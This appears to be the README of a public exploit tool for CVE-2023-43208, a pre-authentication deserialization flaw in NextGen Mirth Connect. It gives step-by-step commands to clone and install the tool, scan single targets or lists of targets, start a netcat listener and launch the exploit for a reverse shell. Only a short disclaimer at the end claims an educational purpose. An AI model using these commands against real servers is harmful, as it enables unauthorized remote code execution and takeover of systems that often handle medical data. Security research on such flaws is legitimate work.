A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application.
To utilize this exploit tool, follow these simple steps:
-
Clone the Repository:
- Open a terminal or command prompt.
- Run the command:
git clone https://github.com/gotr00t0day/NextGen-Mirth-Connect-Exploit.git
-
Navigate to the Project Directory:
- Change into the project directory with:
cd NextGen-Mirth-Connect-Exploit
- Change into the project directory with:
-
Install Dependencies:
- Ensure you have Python3 and pip installed on your system.
- Install required Python libraries with:
pip3 install -r requirements.txt
-
To check if a specific target is vulnerable, use:
python3 mirth_connect_exploit.py -t <Target_IP> -p <Port> -
To check a list of targets from a file, use:
python3 mirth_connect_exploit.py -f <Filename>
-
First, set up a listener on your local machine:
nc -lvnp <Listener_Port> -
Then, to exploit a vulnerable target and get a reverse shell, run:
python3 mirth_connect_exploit.py -t <Target_IP> -p <Port> -lh <Local_Host> -lp <Local_Port> --exploit
Note: Replace <Target_IP>, <Port>, <Filename>, <Listener_Port>, <Local_Host>, and <Local_Port> with your actual values.
For an in-depth analysis and understanding of the CVE-2023-43208 vulnerability within NextGen Mirth Connect, and how this exploit works, refer to the detailed write-up provided by Horizon3.ai:
Writeup for CVE-2023-43208 NextGen Mirth Connect Pre-Auth RCE
This comprehensive guide offers insights into the vulnerability's technical details, impact assessment, and step-by-step exploitation process.
The information and tools provided are for educational and security research purposes only. Use of this tool for attacking targets without prior mutual consent is illegal. The developer assumes no liability and is not responsible for any misuse or damage caused by this tool.